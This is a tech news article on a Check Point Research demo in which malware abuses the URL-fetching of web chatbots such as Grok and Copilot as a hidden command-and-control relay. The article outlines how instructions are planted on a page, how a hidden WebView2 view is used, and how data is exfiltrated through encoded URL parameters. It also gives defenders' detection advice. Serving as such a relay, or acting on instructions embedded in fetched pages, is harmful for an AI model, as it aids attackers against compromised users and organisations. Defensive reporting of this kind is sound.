Thursday, February 19, 2026
Google search engine
HomeTechnologyWeb browsing AI chatbots can be abused as malware relays

Web browsing AI chatbots can be abused as malware relays

According to a demo from Check Point Research, AI chatbots can be used as malware relays while surfing the Internet. Instead of malware calling a traditional command server, it can use a chatbot’s URL fetching to retrieve instructions from a malicious page and then redirect the response back to the infected computer.

In many environments, traffic to key AI targets is already treated as routine, which can result in command-and-control becoming part of normal web usage. The same path can also be used to move data.

Microsoft addressed the work in a statement, calling it a communications issue following the compromise. It said that once a device is compromised, attackers will attempt to use all available services, including AI-based services, and it called for deep security controls to prevent infections and reduce the consequences afterwards.

The demo turns the chat into a relay

The concept is simple. The malware causes the AI ​​web interface to load a URL, summarize what it finds, and then searches the returned text for an embedded instruction.

Check Point said it tested the technology against Grok and Microsoft Copilot through their web interfaces. An important detail is access. The flow is designed to avoid developer APIs and in the tested scenarios it can work without an API key, reducing the risk of misuse.

In the event of data theft, the mechanism can also work in reverse. One method described is to place data in URL query parameters and then rely on the AI-triggered request to deliver it to the opponent’s infrastructure. Simple encoding can further obfuscate the data being sent, making simple content filtering less reliable.

Why it’s harder to see

This is not a new class of malware. It’s a well-known command and control pattern embedded in a service that many companies actively enable. If browser-enabled AI services are left open by default, an infected system may attempt to hide behind domains that appear to be low-risk.

Check Point also highlights how common the plumbing is. The example uses WebView2 as an embedded browser component on modern Windows computers. In the described workflow, a program collects basic host details, opens a hidden web view for an AI service, fires a URL request, and then parses the response to extract the next command. This may resemble normal app behavior, not an obvious signal.

What security teams should do

Treat web-enabled chatbots like any other highly trusted cloud app that can be abused if compromised. If permitted, look for automation patterns, repeated URL loads, unusual prompt rhythms, or traffic volumes that do not correspond to human usage.

AI browsing capabilities may belong to managed devices and specific roles, not to each computer. The open question is scaling. This is a demo and does not quantify success rates against hardcore fleets. The next thing to watch is whether vendors introduce greater automation detection in web chat and whether defenders start treating AI targets as potential post-compromise channels.

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments